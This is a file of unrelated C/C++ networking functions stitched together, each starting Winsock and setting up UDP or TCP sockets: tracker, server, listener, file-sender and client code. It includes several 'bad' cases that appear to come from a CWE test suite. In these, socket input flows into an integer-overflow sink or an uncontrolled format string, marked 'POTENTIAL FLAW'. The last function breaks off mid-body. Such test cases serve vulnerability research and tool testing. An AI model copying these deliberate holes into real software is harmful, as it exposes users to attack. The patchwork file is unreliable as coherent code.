* @param udp_port the UDP listening port
*/
bool vrpn_Tracker_JsonNet::_network_init(int udp_port) {
int iResult;
#ifdef _WIN32
{
// Initialize Winsock
WORD versionRequested = MAKEWORD(2,2);
WSADATA wsaData;
iResult = WSAStartup(versionRequested, &wsaData);
if (iResult != 0) {
printf("WSAStartup failed with error: %d\n", iResult);
return false;
}
}
#endif
#ifdef _WIN32
{
// Create a SOCKET for connecting to server
_socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (_socket == INVALID_SOCKET) {
printf("socket failed with error: %ld\n", WSAGetLastError());
//freeaddrinfo(result);
WSACleanup();
return false;
}
}
#else
{
int usock;
usock = socket(PF_INET, SOCK_DGRAM, 0);
if (usock < 0){
return false;
}
_socket = usock;
}
#endif
struct sockaddr_in localSocketAddress;
localSocketAddress.sin_family = AF_INET;
localSocketAddress.sin_addr.s_addr = htonl(INADDR_ANY);
localSocketAddress.sin_port = htons(udp_port);
// Setup the listening socket
iResult = bind( _socket, (struct sockaddr*)&localSocketAddress, sizeof(localSocketAddress));
if (iResult < 0) {
#ifdef _WIN32
printf("bind failed with error: %d\n", WSAGetLastError());
#else
printf("bind failed.");
#endif
//freeaddrinfo(result);
_network_release();
return false;
}
//freeaddrinfo(result);
return true;
}
S32 start_net(S32& socket_out, int& nPort)
{
// Create socket, make non-blocking
// Init WinSock
int nRet;
int hSocket;
int snd_size = SEND_BUFFER_SIZE;
int rec_size = RECEIVE_BUFFER_SIZE;
int buff_size = 4;
// Initialize windows specific stuff
if(WSAStartup(0x0202, &stWSAData))
{
S32 err = WSAGetLastError();
WSACleanup();
LL_WARNS("AppInit") << "Windows Sockets initialization failed, err " << err << LL_ENDL;
return 1;
}
// Get a datagram socket
hSocket = (int)socket(AF_INET, SOCK_DGRAM, 0);
if (hSocket == INVALID_SOCKET)
{
S32 err = WSAGetLastError();
WSACleanup();
LL_WARNS("AppInit") << "socket() failed, err " << err << LL_ENDL;
return 2;
}
// Name the socket (assign the local port number to receive on)
stLclAddr.sin_family = AF_INET;
stLclAddr.sin_addr.s_addr = htonl(INADDR_ANY);
stLclAddr.sin_port = htons(nPort);
S32 attempt_port = nPort;
LL_DEBUGS("AppInit") << "attempting to connect on port " << attempt_port << LL_ENDL;
nRet = bind(hSocket, (struct sockaddr*) &stLclAddr, sizeof(stLclAddr));
if (nRet == SOCKET_ERROR)
{
// If we got an address in use error...
if (WSAGetLastError() == WSAEADDRINUSE)
{
// Try all ports from PORT_DISCOVERY_RANGE_MIN to PORT_DISCOVERY_RANGE_MAX
for(attempt_port = PORT_DISCOVERY_RANGE_MIN;
attempt_port <= PORT_DISCOVERY_RANGE_MAX;
attempt_port++)
{
stLclAddr.sin_port = htons(attempt_port);
LL_DEBUGS("AppInit") << "trying port " << attempt_port << LL_ENDL;
nRet = bind(hSocket, (struct sockaddr*) &stLclAddr, sizeof(stLclAddr));
if (!(nRet == SOCKET_ERROR &&
WSAGetLastError() == WSAEADDRINUSE))
{
break;
}
}
if (nRet == SOCKET_ERROR)
{
LL_WARNS("AppInit") << "startNet() : Couldn't find available network port." << LL_ENDL;
// Fail gracefully here in release
return 3;
}
}
else
// Some other socket error
{
LL_WARNS("AppInit") << llformat("bind() port: %d failed, Err: %d\n", nPort, WSAGetLastError()) << LL_ENDL;
// Fail gracefully in release.
return 4;
}
}
sockaddr_in socket_address;
S32 socket_address_size = sizeof(socket_address);
getsockname(hSocket, (SOCKADDR*) &socket_address, &socket_address_size);
attempt_port = ntohs(socket_address.sin_port);
LL_INFOS("AppInit") << "connected on port " << attempt_port << LL_ENDL;
nPort = attempt_port;
// Set socket to be non-blocking
unsigned long argp = 1;
nRet = ioctlsocket (hSocket, FIONBIO, &argp);
if (nRet == SOCKET_ERROR)
{
printf("Failed to set socket non-blocking, Err: %d\n",
WSAGetLastError());
}
// set a large receive buffer
nRet = setsockopt(hSocket, SOL_SOCKET, SO_RCVBUF, (char *)&rec_size, buff_size);
if (nRet)
{
LL_INFOS("AppInit") << "Can't set receive buffer size!" << LL_ENDL;
}
nRet = setsockopt(hSocket, SOL_SOCKET, SO_SNDBUF, (char *)&snd_size, buff_size);
if (nRet)
{
LL_INFOS("AppInit") << "Can't set send buffer size!" << LL_ENDL;
}
getsockopt(hSocket, SOL_SOCKET, SO_RCVBUF, (char *)&rec_size, &buff_size);
getsockopt(hSocket, SOL_SOCKET, SO_SNDBUF, (char *)&snd_size, &buff_size);
LL_DEBUGS("AppInit") << "startNet - receive buffer size : " << rec_size << LL_ENDL;
LL_DEBUGS("AppInit") << "startNet - send buffer size : " << snd_size << LL_ENDL;
// Setup a destination address
//char achMCAddr[MAXADDRSTR] = " "; /* Flawfinder: ignore */
stDstAddr.sin_family = AF_INET;
//stDstAddr.sin_addr.s_addr = inet_addr(achMCAddr);
stDstAddr.sin_addr.s_addr = INVALID_HOST_IP_ADDRESS; //Not so sure about this...
stDstAddr.sin_port = htons(nPort);
socket_out = hSocket;
return 0;
}
LIBRARY_API bool socketNet::create (struct networkStruct& socketData)
{
char ac[32];
char *client_ip_address = NULL;
HANDLE hTimer = NULL;
LARGE_INTEGER liDueTime;
liDueTime.QuadPart=-30000000; //! 3 second timer for polling
struct sockaddr_in serverAddr; //! server's socket address
struct sockaddr_in clientAddr; //! client's socket address
int sockAddrSize; //! size of socket address structure
SOCKET newFd; //! socket descriptor from accept
int ix = 0; //! counter for work task names
int tcpServer_shutdown = 0;
unsigned long l = 1; //! to set sockets to nonblocking
hTimer = CreateWaitableTimer(NULL, TRUE, NULL);
if (NULL == hTimer)
{
//! Timer error
}
//! Set up the local address
sockAddrSize = sizeof (struct sockaddr_in);
WSADATA wsaData;
int wsaret = WSAStartup(0x101, &wsaData);
if (wsaret != 0)
return false;
//! Clear (zero-out) serverAddr
memset((char *) &serverAddr, 0, sockAddrSize);
serverAddr.sin_addr.s_addr = htons (INADDR_ANY);
serverAddr.sin_family = AF_INET;
serverAddr.sin_port = htons ((u_short)socketData.sP);
gethostname(ac, sizeof(ac));
struct hostent *phe = gethostbyname(ac);
socketData.serverAddress = new char[128];//inet_ntoa (serverAddr.sin_addr);
struct in_addr a1;//, a2, a3, a4;
int i = 0;
//while (phe->h_addr_list[i] != 0)
{
memcpy (&a1, phe->h_addr_list[i], sizeof(struct in_addr));
sprintf (socketData.serverAddress, "%s", inet_ntoa(a1));
++i;
}
//! This allows us to have multiple clients attached to the same port
if (!socketData.bound)
{
//! create a TCP-based socket
if ((socketData.sFd = socket(AF_INET, SOCK_STREAM, 0)) == ERROR_F)
{
#ifdef NOISY
perror ("socket");
#endif
return false;
}
//! bind socket to local address
if (bind (socketData.sFd,
(struct sockaddr *) &serverAddr,
sockAddrSize) == ERROR_F)
{
#ifdef NOISY
perror ("bind");
#endif
closesocket (socketData.sFd);
WSACleanup ();
return false;
}
socketData.bound = true;
}
//ioctlsocket (socketData.sFd, FIONBIO, &l);
//! Create queue for client connection requests
if (listen (socketData.sFd, SERVER_MAX_CONNECTIONS) == ERROR_F)
{
closesocket (socketData.sFd);
WSACleanup ();
socketData.bound = true;
return false;
}
//! Accept new connect requests and spawn tasks to process them
//! Accept the first connection and use it...
newFd = 0;
do
{
//! If we stop the connection attempt
bool okay;
okay = false;
do
{
if (!settings_->globalRunServer)
{
closesocket (socketData.sFd);
WSACleanup();
return false;
}
if ((newFd = accept (socketData.sFd,
(struct sockaddr*)&clientAddr,
&sockAddrSize)) == ERROR_F)
{
printf ("%s\n", inet_ntoa (clientAddr.sin_addr));
#ifdef NOISY
perror ("accept");
#endif
int g = WSAGetLastError();
//! We expect the error WSAEWOULDBLOCK since the socket is non-blocking
if (g != WSAEWOULDBLOCK)
{
closesocket (socketData.sFd);
WSACleanup ();
return false;
}
// Set a timer to wait for 0.1 seconds--Poll @ 10 Hz
if (!SetWaitableTimer(hTimer, &liDueTime, 1, NULL, NULL, 0))
{
//! Timer error
}
if (WaitForSingleObject(hTimer, INFINITE) != WAIT_OBJECT_0)
{
//! Timer error
}
}
else
{
okay = true;
}
} while (!okay);
if (newFd > 0)
{
client_ip_address = inet_ntoa (clientAddr.sin_addr);
//! JAM: A problem encountered with Windows is that it constantly
//! thinks a connection from 204.204.204.204:52428 is being
//! made
if (strcmp("204.204.204.204", client_ip_address) != 0)
{
//! fill out the struct
socketData.cFd = newFd;
socketData.address = client_ip_address;
socketData.cP = ntohs (clientAddr.sin_port);
//! Disable nonblocking by default
//unsigned long l = 0;
//ioctlsocket (socketData.cFd, FIONBIO, &l);
tcpServer_shutdown = 1; //! say we are done
}
}
}while (tcpServer_shutdown != 1);
socketData.connected = true;
settings_->connected = true;
//l=1;
//ioctlsocket (socketData.cFd, FIONBIO, &l);
return true;
}
PUBLIC BOOL HTEventInit (void)
{
#ifdef WWW_WIN_ASYNC
/*
** We are here starting a hidden window to take care of events from
** the async select() call in the async version of the event loop in
** the Internal event manager (HTEvtLst.c)
*/
static char className[] = "AsyncWindowClass";
WNDCLASS wc;
OSVERSIONINFO osInfo;
wc.style=0;
wc.lpfnWndProc=(WNDPROC)AsyncWindowProc;
wc.cbClsExtra=0;
wc.cbWndExtra=0;
wc.hIcon=0;
wc.hCursor=0;
wc.hbrBackground=0;
wc.lpszMenuName=(LPSTR)0;
wc.lpszClassName=className;
osInfo.dwOSVersionInfoSize = sizeof(osInfo);
GetVersionEx(&osInfo);
/* According to Gary Johnson, GetModuleHandle() works for NT as well */
#if 0
if (osInfo.dwPlatformId == VER_PLATFORM_WIN32s || osInfo.dwPlatformId == VER_PLATFORM_WIN32_WINDOWS)
wc.hInstance=GetModuleHandle(NULL); /* 95 and non threaded platforms */
else
wc.hInstance=GetCurrentProcess(); /* NT and hopefully everything following */
#else
wc.hInstance=GetModuleHandle(NULL); /* Should work on all win32 stuff */
#endif
HTinstance = wc.hInstance;
HTclass = RegisterClass(&wc);
if (!HTclass) {
HTTRACE(THD_TRACE, "HTLibInit.. Can't RegisterClass \"%s\"\n" _ className);
return NO;
}
if (!(HTSocketWin = CreateWindow(className, "WWW_WIN_ASYNC", WS_POPUP, CW_USEDEFAULT, CW_USEDEFAULT,
CW_USEDEFAULT, CW_USEDEFAULT, 0, 0, wc.hInstance,0))) {
#ifdef HTDEBUG
char space[50];
HTTRACE(THD_TRACE, "HTLibInit.. Can't Create Window \"WWW_WIN_ASYNC\" - error:");
sprintf(space, "%ld\n", GetLastError());
HTTRACE(THD_TRACE, space);
#endif /* HTDEBUG */
return NO;
}
HTwinMsg = WM_USER; /* use first available message since app uses none */
/* Register platform specific timer handlers for windows */
HTTimer_registerSetTimerCallback(Timer_setWindowsTimer);
HTTimer_registerDeleteTimerCallback(Timer_deleteWindowsTimer);
#endif /* WWW_WIN_ASYNC */
#ifdef _WINSOCKAPI_
/*
** Initialise WinSock DLL. This must also be shut down! PMH
*/
{
WSADATA wsadata;
if (WSAStartup(DESIRED_WINSOCK_VERSION, &wsadata)) {
HTTRACE(THD_TRACE, "HTEventInit. Can't initialize WinSoc\n");
WSACleanup();
return NO;
}
if (wsadata.wVersion < MINIMUM_WINSOCK_VERSION) {
HTTRACE(THD_TRACE, "HTEventInit. Bad version of WinSoc\n");
WSACleanup();
return NO;
}
HTTRACE(APP_TRACE, "HTEventInit. Using WinSoc version \"%s\".\n" _
wsadata.szDescription);
}
#endif /* _WINSOCKAPI_ */
HTEvent_setRegisterCallback(HTEventList_register);
HTEvent_setUnregisterCallback(HTEventList_unregister);
return YES;
}
void CWE190_Integer_Overflow__int_connect_socket_square_66_bad()
{
int data;
int dataArray[5];
/* Initialize data */
data = 0;
{
#ifdef _WIN32
WSADATA wsaData;
int wsaDataInit = 0;
#endif
int recvResult;
struct sockaddr_in service;
SOCKET connectSocket = INVALID_SOCKET;
char inputBuffer[CHAR_ARRAY_SIZE];
do
{
#ifdef _WIN32
if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
{
break;
}
wsaDataInit = 1;
#endif
/* POTENTIAL FLAW: Read data using a connect socket */
connectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (connectSocket == INVALID_SOCKET)
{
break;
}
memset(&service, 0, sizeof(service));
service.sin_family = AF_INET;
service.sin_addr.s_addr = inet_addr(IP_ADDRESS);
service.sin_port = htons(TCP_PORT);
if (connect(connectSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR)
{
break;
}
/* Abort on error or the connection was closed, make sure to recv one
* less char than is in the recv_buf in order to append a terminator */
recvResult = recv(connectSocket, inputBuffer, CHAR_ARRAY_SIZE - 1, 0);
if (recvResult == SOCKET_ERROR || recvResult == 0)
{
break;
}
/* NUL-terminate the string */
inputBuffer[recvResult] = '\0';
/* Convert to int */
data = atoi(inputBuffer);
}
while (0);
if (connectSocket != INVALID_SOCKET)
{
CLOSE_SOCKET(connectSocket);
}
#ifdef _WIN32
if (wsaDataInit)
{
WSACleanup();
}
#endif
}
/* put data in array */
dataArray[2] = data;
CWE190_Integer_Overflow__int_connect_socket_square_66b_badSink(dataArray);
}
int CompletionPortListener::Start()
{
if ((Ret = WSAStartup((2, 2), &wsaData)) != 0)
{
printf("WSAStartup() failed with error %d\n", Ret);
return 1;
}
else
printf("WSAStartup() is OK!\n");
// Setup an I/O completion port
if ((CompletionPort = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0)) == NULL)
{
printf("CreateIoCompletionPort() failed with error %d\n", GetLastError());
return 1;
}
else
printf("CreateIoCompletionPort() is damn OK!\n");
// Determine how many processors are on the system
GetSystemInfo(&SystemInfo);
// Create worker threads based on the number of processors available on the
// system. Create two worker threads for each processor
for (i = 0; i < (int)SystemInfo.dwNumberOfProcessors * 2; i++)
{
// Create a server worker thread and pass the completion port to the thread
if ((ThreadHandle = CreateThread(NULL, 0, ServerWorkerThread, this, 0, &ThreadID)) == NULL)
{
printf("CreateThread() failed with error %d\n", GetLastError());
return 1;
}
else
printf("CreateThread() is OK!\n");
// Close the thread handle
CloseHandle(ThreadHandle);
}
// Create a listening socket
if ((Listen = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET)
{
printf("WSASocket() failed with error %d\n", WSAGetLastError());
return 1;
}
else
printf("WSASocket() is OK!\n");
InternetAddr.sin_family = AF_INET;
InternetAddr.sin_addr.s_addr = htonl(INADDR_ANY);
InternetAddr.sin_port = htons(DEFAULT_PORT_INT);
if (bind(Listen, (PSOCKADDR)&InternetAddr, sizeof(InternetAddr)) == SOCKET_ERROR)
{
printf("bind() failed with error %d\n", WSAGetLastError());
return 1;
}
else
printf("bind() is fine!\n");
// Prepare socket for listening
if (listen(Listen, 5) == SOCKET_ERROR)
{
printf("listen() failed with error %d\n", WSAGetLastError());
return 1;
}
else
printf("listen() is working...\n");
completionPortStackListener.Start();
// Accept connections and assign to the completion port
while (TRUE)
{
if ((Accept = WSAAccept(Listen, NULL, NULL, NULL, 0)) == SOCKET_ERROR)
{
printf("WSAAccept() failed with error %d\n", WSAGetLastError());
return 1;
}
else
printf("WSAAccept() looks fine!\n");
// Create a socket information structure to associate with the socket
if ((PerHandleData = (LPPER_HANDLE_DATA)GlobalAlloc(GPTR, sizeof(PER_HANDLE_DATA))) == NULL)
printf("GlobalAlloc() failed with error %d\n", GetLastError());
else
printf("GlobalAlloc() for LPPER_HANDLE_DATA is OK!\n");
// Associate the accepted socket with the original completion port
printf("Socket number %d got connected...\n", Accept);
PerHandleData->Socket = Accept;
if (CreateIoCompletionPort((HANDLE)Accept, CompletionPort, (DWORD)PerHandleData, 0) == NULL)
{
printf("CreateIoCompletionPort() failed with error %d\n", GetLastError());
return 1;
}
else
printf("CreateIoCompletionPort() is OK!\n");
// Create per I/O socket information structure to associate with the WSARecv call below
if ((PerIoData = (LPPER_IO_OPERATION_DATA)GlobalAlloc(GPTR, sizeof(PER_IO_OPERATION_DATA))) == NULL)
{
printf("GlobalAlloc() failed with error %d\n", GetLastError());
return 1;
}
else
printf("GlobalAlloc() for LPPER_IO_OPERATION_DATA is OK!\n");
ZeroMemory(&(PerIoData->Overlapped), sizeof(OVERLAPPED));
PerIoData->BytesSEND = 0;
PerIoData->BytesRECV = 0;
PerIoData->DataBuf.len = DATA_BUFSIZE;
PerIoData->DataBuf.buf = PerIoData->Buffer;
Flags = 0;
if (WSARecv(Accept, &(PerIoData->DataBuf), 1, &RecvBytes, &Flags, &(PerIoData->Overlapped), NULL) == SOCKET_ERROR)
{
if (WSAGetLastError() != ERROR_IO_PENDING)
{
printf("WSARecv() failed with error %d\n", WSAGetLastError());
return 1;
}
}
else
printf("WSARecv() is OK!\n");
}
}
int send_file(HTHREAD_PTR descr, char *filename)
{
WSADATA wsa_data;
SOCKET data_socket = INVALID_SOCKET;
struct sockaddr_in send_data_addr;
HPACKET packet;
HPARTITION partition;
FILE *fp;
int return_code;
unsigned long at_location,
read_amount,
tries;
unsigned char packet_count;
char control_message[MAX_INPUT_LENGTH];
if(fopen_s(&fp, filename, "rb") > 0)
{
memset(control_message, 0, sizeof(MAX_INPUT_LENGTH));
control_message[0] = CONTROL_MESSAGE_NO_SUCH_FILE;
return_code = send(descr->socket, control_message, (int)strlen(control_message), 0);
return 1;
}
for(tries = 0; tries < CONTROL_MESSAGE_RECV_RETRIES; tries++)
{
memset(control_message, 0, sizeof(MAX_INPUT_LENGTH));
return_code = recv(descr->socket, control_message, MAX_INPUT_LENGTH-1, 0);
if(return_code < 1)
{
printf("failed to recv command: %d\n", WSAGetLastError());
closesocket(data_socket);
return 0;
}
if(control_message[0] == CONTROL_MESSAGE_OK_START_SENDING)
break;
}
if(tries >= CONTROL_MESSAGE_RECV_RETRIES)
{
printf("No CONTROL_MESSAGE_OK_START_SENDING from %s\n", inet_ntoa(descr->address.sin_addr));
closesocket(data_socket);
return 0;
}
WSAStartup(MAKEWORD(2,2), &wsa_data);
data_socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
send_data_addr.sin_family = AF_INET;
send_data_addr.sin_port = htons(CONNECT_PORT_N);//descr->address.sin_port;
send_data_addr.sin_addr = descr->address.sin_addr;//inet_addr("123.456.789.1");
packet.partition_id = 0;
packet.reserved = 0;
while(!feof(fp))
{
memset(partition.packet_stats, 0, MAX_PARTITION_DIVISIONS+1);
partition.actual_size = (unsigned long)fread(partition.data, 1, PARTITION_LENGTH_TOTAL, fp);
packet_count = (unsigned char)ceil(partition.actual_size / PACKET_LENGTH_DATA);
memset(control_message, 0, sizeof(MAX_INPUT_LENGTH));
sprintf_s(control_message, MAX_INPUT_LENGTH, " %u", partition.actual_size);
control_message[0] = CONTROL_MESSAGE_SENDING_DATA;
return_code = send(descr->socket, control_message, (int)strlen(control_message)+1, 0);
if(return_code == SOCKET_ERROR)
{
printf("failed to send command: %d\n", WSAGetLastError());
closesocket(data_socket);
return 0;
}
while(1)
{
for(packet.packet_id = 0; packet.packet_id < packet_count; packet.packet_id++)
{
if(partition.packet_stats[packet.packet_id] != 1)
break;
}
if(packet.packet_id == packet_count)
break;
for(packet.packet_id = 0; packet.packet_id < packet_count; packet.packet_id++)
{
if(partition.packet_stats[packet.packet_id] != 1)
{
memset(packet.data, 0, sizeof(PARTITION_LENGTH_TOTAL));
at_location = packet.packet_id * PACKET_LENGTH_DATA;
read_amount = at_location + PACKET_LENGTH_DATA < partition.actual_size ? PACKET_LENGTH_DATA : partition.actual_size - at_location;
memcpy(packet.data, &partition.data[at_location], read_amount);
packet.crc = compute_crc((const unsigned char *)packet.data, PACKET_LENGTH_DATA);
return_code = sendto(data_socket, (char *)&packet, sizeof(packet), 0, (SOCKADDR *)&send_data_addr, sizeof(send_data_addr));
if(return_code == SOCKET_ERROR)
{
printf("failed to send command: %d\n", WSAGetLastError());
closesocket(data_socket);
return 0;
}
Sleep(5);
}
}
memset(control_message, 0, sizeof(MAX_INPUT_LENGTH));
control_message[0] = CONTROL_MESSAGE_PARTITION_SENT;
return_code = send(descr->socket, control_message, (int)strlen(control_message)+1, 0);
if(return_code == SOCKET_ERROR)
{
printf("failed to send command: %d\n", WSAGetLastError());
closesocket(data_socket);
return 0;
}
for(tries = 0; tries < CONTROL_MESSAGE_RECV_RETRIES; tries++)
{
memset(control_message, 0, sizeof(MAX_INPUT_LENGTH));
return_code = recv(descr->socket, control_message, MAX_INPUT_LENGTH-1, 0);
if(return_code < 1)
{
printf("failed to recv command: %d\n", WSAGetLastError());
closesocket(data_socket);
return 0;
}
if(control_message[0] == CONTROL_MESSAGE_PARTITION_STATUS)
{
memset(partition.packet_stats, 0, MAX_PARTITION_DIVISIONS+1);
memcpy(partition.packet_stats, &control_message[2], MAX_PARTITION_DIVISIONS);
break;
}
}
if(tries >= CONTROL_MESSAGE_RECV_RETRIES)
{
printf("No CONTROL_MESSAGE_PARTITION_STATUS from %s\n", inet_ntoa(descr->address.sin_addr));
closesocket(data_socket);
return 0;
}
}
packet.partition_id++;
}
fclose(fp);
memset(control_message, 0, sizeof(MAX_INPUT_LENGTH));
control_message[0] = CONTROL_MESSAGE_ALL_DATA_SENT;
return_code = send(descr->socket, control_message, (int)strlen(control_message)+1, 0);
if(return_code == SOCKET_ERROR)
{
printf("failed to send command: %d\n", WSAGetLastError());
closesocket(data_socket);
return 1;
}
closesocket(data_socket);
return 1;
}
/* Testing code for ld_event_base_dump_events().
Notes that just because we have code to exercise this function,
doesn't mean that *ANYTHING* about the output format is guaranteed to
remain in the future.
*/
int
main(int argc, char **argv)
{
#define N_EVENTS 13
int i;
struct event *ev[N_EVENTS];
evutil_socket_t pair1[2];
evutil_socket_t pair2[2];
struct timeval tv_onesec = {1,0};
struct timeval tv_two5sec = {2,500*1000};
const struct timeval *tv_onesec_common;
const struct timeval *tv_two5sec_common;
struct event_base *base;
struct timeval now;
#ifdef _WIN32
WORD wVersionRequested;
WSADATA wsaData;
wVersionRequested = MAKEWORD(2, 2);
WSAStartup(wVersionRequested, &wsaData);
#endif
#ifdef _WIN32
#define LOCAL_SOCKETPAIR_AF AF_INET
#else
#define LOCAL_SOCKETPAIR_AF AF_UNIX
#endif
if (ld_evutil_make_internal_pipe_(pair1) < 0 ||
ld_evutil_make_internal_pipe_(pair2) < 0) {
sock_perror("ld_evutil_make_internal_pipe_");
return 1;
}
if (!(base = ld_event_base_new())) {
fprintf(stderr,"Couldn't make event_base\n");
return 2;
}
tv_onesec_common = ld_event_base_init_common_timeout(base, &tv_onesec);
tv_two5sec_common = ld_event_base_init_common_timeout(base, &tv_two5sec);
ev[0] = ld_event_new(base, pair1[0], EV_WRITE, callback1, NULL);
ev[1] = ld_event_new(base, pair1[1], EV_READ|EV_PERSIST, callback1, NULL);
ev[2] = ld_event_new(base, pair2[0], EV_WRITE|EV_PERSIST, callback2, NULL);
ev[3] = ld_event_new(base, pair2[1], EV_READ, callback2, NULL);
/* For timers */
ev[4] = evtimer_new(base, callback1, NULL);
ev[5] = evtimer_new(base, callback1, NULL);
ev[6] = evtimer_new(base, callback1, NULL);
ev[7] = ld_event_new(base, -1, EV_PERSIST, callback2, NULL);
ev[8] = ld_event_new(base, -1, EV_PERSIST, callback2, NULL);
ev[9] = ld_event_new(base, -1, EV_PERSIST, callback2, NULL);
/* To activate */
ev[10] = ld_event_new(base, -1, 0, callback1, NULL);
ev[11] = ld_event_new(base, -1, 0, callback2, NULL);
/* Signals */
ev[12] = evsignal_new(base, SIGINT, callback2, NULL);
ld_event_add(ev[0], NULL);
ld_event_add(ev[1], &tv_onesec);
ld_event_add(ev[2], tv_onesec_common);
ld_event_add(ev[3], tv_two5sec_common);
ld_event_add(ev[4], tv_onesec_common);
ld_event_add(ev[5], tv_onesec_common);
ld_event_add(ev[6], &tv_onesec);
ld_event_add(ev[7], tv_two5sec_common);
ld_event_add(ev[8], tv_onesec_common);
ld_event_add(ev[9], &tv_two5sec);
ld_event_active(ev[10], EV_READ, 1);
ld_event_active(ev[11], EV_READ|EV_WRITE|EV_TIMEOUT, 1);
ld_event_active(ev[1], EV_READ, 1);
ld_event_add(ev[12], NULL);
evutil_gettimeofday(&now,NULL);
puts("=====expected");
printf("Now= %ld.%06d\n",(long)now.tv_sec,(int)now.tv_usec);
puts("Inserted:");
printf(" %p [fd %ld] Write\n",ev[0],(long)pair1[0]);
printf(" %p [fd %ld] Read Persist Timeout=T+1\n",ev[1],(long)pair1[1]);
printf(" %p [fd %ld] Write Persist Timeout=T+1\n",ev[2],(long)pair2[0]);
printf(" %p [fd %ld] Read Timeout=T+2.5\n",ev[3],(long)pair2[1]);
printf(" %p [fd -1] Timeout=T+1\n",ev[4]);
printf(" %p [fd -1] Timeout=T+1\n",ev[5]);
printf(" %p [fd -1] Timeout=T+1\n",ev[6]);
printf(" %p [fd -1] Persist Timeout=T+2.5\n",ev[7]);
printf(" %p [fd -1] Persist Timeout=T+1\n",ev[8]);
printf(" %p [fd -1] Persist Timeout=T+2.5\n",ev[9]);
printf(" %p [sig %d] Signal Persist\n", ev[12], (int)SIGINT);
puts("Active:");
printf(" %p [fd -1, priority=0] Read active\n", ev[10]);
printf(" %p [fd -1, priority=0] Read Write Timeout active\n", ev[11]);
printf(" %p [fd %ld, priority=0] Read active\n", ev[1], (long)pair1[1]);
puts("======received");
ld_event_base_dump_events(base, stdout);
for (i = 0; i < N_EVENTS; ++i) {
ld_event_free(ev[i]);
}
ld_event_base_free(base);
return 0;
}
int main(int argc, char* argv[])
{
//----------------------
// Initialize Winsock.
WSADATA wsaData;
int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
if (iResult != NO_ERROR) {
wprintf(L"WSAStartup failed with error: %ld\n", iResult);
return 1;
}
//----------------------
// Create a SOCKET for connecting to server
SOCKET ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (ConnectSocket == INVALID_SOCKET) {
printf("Error at socket(): %ld\n", WSAGetLastError() );
WSACleanup();
return 1;
}
//----------------------
// The sockaddr_in structure specifies the address family,
// IP address, and port for the socket that is being bound.
sockaddr_in addrServer;
addrServer.sin_family = AF_INET;
addrServer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
addrServer.sin_port = htons(20131);
//----------------------
// Connect to server.
iResult = connect( ConnectSocket, (SOCKADDR*) &addrServer, sizeof(addrServer) );
if ( iResult == SOCKET_ERROR) {
closesocket (ConnectSocket);
printf("Unable to connect to server: %ld\n", WSAGetLastError());
WSACleanup();
return 1;
}
char buf[1024+1];
//以一个无限循环的方式,不停地接收输入,发送到server
while(1)
{
int count = _read (0, buf, 1024);//从标准输入读入
if(count<=0)break;
int sendCount,currentPosition=0;
while( count>0 && (sendCount=send(ConnectSocket ,buf+currentPosition,count,0))!=SOCKET_ERROR)
{
count-=sendCount;
currentPosition+=sendCount;
}
if(sendCount==SOCKET_ERROR)break;
count =recv(ConnectSocket ,buf,1024,0);
if(count==0)break;//被对方关闭
if(count==SOCKET_ERROR)break;//错误count<0
buf[count]='\0';
printf("%s",buf);
}
//结束连接
closesocket(ConnectSocket);
WSACleanup();
return 0;
}
void CWE134_Uncontrolled_Format_String__wchar_t_connect_socket_vfprintf_32_bad()
{
wchar_t * data;
wchar_t * *dataPtr1 = &data;
wchar_t * *dataPtr2 = &data;
wchar_t dataBuffer[100] = L"";
data = dataBuffer;
{
wchar_t * data = *dataPtr1;
{
#ifdef _WIN32
WSADATA wsaData;
int wsaDataInit = 0;
#endif
int recvResult;
struct sockaddr_in service;
wchar_t *replace;
SOCKET connectSocket = INVALID_SOCKET;
size_t dataLen = wcslen(data);
do
{
#ifdef _WIN32
if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
{
break;
}
wsaDataInit = 1;
#endif
/* POTENTIAL FLAW: Read data using a connect socket */
connectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (connectSocket == INVALID_SOCKET)
{
break;
}
memset(&service, 0, sizeof(service));
service.sin_family = AF_INET;
service.sin_addr.s_addr = inet_addr(IP_ADDRESS);
service.sin_port = htons(TCP_PORT);
if (connect(connectSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR)
{
break;
}
/* Abort on error or the connection was closed, make sure to recv one
* less char than is in the recv_buf in order to append a terminator */
/* Abort on error or the connection was closed */
recvResult = recv(connectSocket, (char *)(data + dataLen), sizeof(wchar_t) * (100 - dataLen - 1), 0);
if (recvResult == SOCKET_ERROR || recvResult == 0)
{
break;
}
/* Append null terminator */
data[dataLen + recvResult / sizeof(wchar_t)] = L'\0';
/* Eliminate CRLF */
replace = wcschr(data, L'\r');
if (replace)
{
*replace = L'\0';
}
replace = wcschr(data, L'\n');
if (replace)
{
*replace = L'\0';
}
}
while (0);
if (connectSocket != INVALID_SOCKET)
{
CLOSE_SOCKET(connectSocket);
}
#ifdef _WIN32
if (wsaDataInit)
{
WSACleanup();
}
#endif
}
*dataPtr1 = data;
}
{
wchar_t * data = *dataPtr2;
badVaSink(data, data);
}
}
void bad()
{
size_t data;
/* define a function pointer */
void (*funcPtr) (size_t) = badSink;
/* Initialize data */
data = 0;
{
#ifdef _WIN32
WSADATA wsaData;
int wsaDataInit = 0;
#endif
int recvResult;
struct sockaddr_in service;
SOCKET listenSocket = INVALID_SOCKET;
SOCKET acceptSocket = INVALID_SOCKET;
char inputBuffer[CHAR_ARRAY_SIZE];
do
{
#ifdef _WIN32
if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
{
break;
}
wsaDataInit = 1;
#endif
/* POTENTIAL FLAW: Read data using a listen socket */
listenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (listenSocket == INVALID_SOCKET)
{
break;
}
memset(&service, 0, sizeof(service));
service.sin_family = AF_INET;
service.sin_addr.s_addr = INADDR_ANY;
service.sin_port = htons(TCP_PORT);
